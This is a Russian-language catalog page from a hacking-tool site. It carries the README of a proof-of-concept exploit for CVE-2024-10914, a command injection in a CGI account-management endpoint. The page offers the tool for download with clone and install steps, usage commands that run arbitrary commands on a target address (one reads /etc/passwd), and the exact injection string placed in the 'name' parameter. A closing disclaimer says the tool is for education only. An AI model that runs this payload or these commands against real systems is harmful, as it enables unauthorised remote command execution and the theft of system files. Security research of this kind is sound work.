Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10914__POC — PoC для эксплуатации CVE-2024-10914 | Kitploit
Инструменты/GitHubGitHub/0xss3k/cve-2024-10914__poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

PoC для эксплуатации CVE-2024-10914

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-10914 - Proof of Concept

Эксплойт для уязвимости внедрения команд в конечной точке /cgi-bin/account_mgr.cgi. Эта уязвимость позволяет выполнять произвольные команды в затронутой системе через несанитизированные параметры.

Описание уязвимости

CVE-2024-10914 — это уязвимость внедрения команд, которая затрагивает устройства с веб-интерфейсом CGI. Уязвимое приложение не проверяет должным образом параметр name в запросе cgi_user_add, позволяя злоумышленнику внедрять системные команды, которые будут выполняться с привилегиями приложения.

Требования

  • Python 3.7+
  • библиотека requests

Установка

Клонируйте репозиторий и установите зависимости:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

Или установите вручную:

root@kitploit:~
pip install requests

Использование

Скрипт принимает два аргумента:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <КОМАНДА>

Параметры

  • -u, --url (обязательно): URL цели (пример: http://192.168.1.1)
  • -c, --command (опционально): Выполняемая команда (по умолчанию: id)

Примеры

Выполнить команду id:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

Выполнить пользовательскую команду:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

Вывести список файлов:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

Техническая работа

Эксплойт отправляет GET-запрос к уязвимой конечной точке со следующим payload:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <КОМАНДА>; "

Пустая строка закрывается кавычками, и внедряется нужная команда, которая выполняется в контексте сервера.

Ответ

Скрипт покажет:

  • Состояние соединения
  • Отправленный payload
  • HTTP-код состояния
  • Полный ответ сервера

Юридическое предупреждение

Данный код предоставляется исключительно в образовательных целях и для исследований безопасности. Он должен быть использован только в системах, на которые у вас есть явное разрешение. Несанкционированное использование этого эксплойта может нарушить местные законы и являться уголовным преступлением. Автор не несёт ответственности за ненадлежащее использование этого инструмента.

Ссылки

  • CVE-2024-10914
  • Оценка CVSS: TBD

Автор

SS3K

Лицензия

Не указана

Скачать инструмент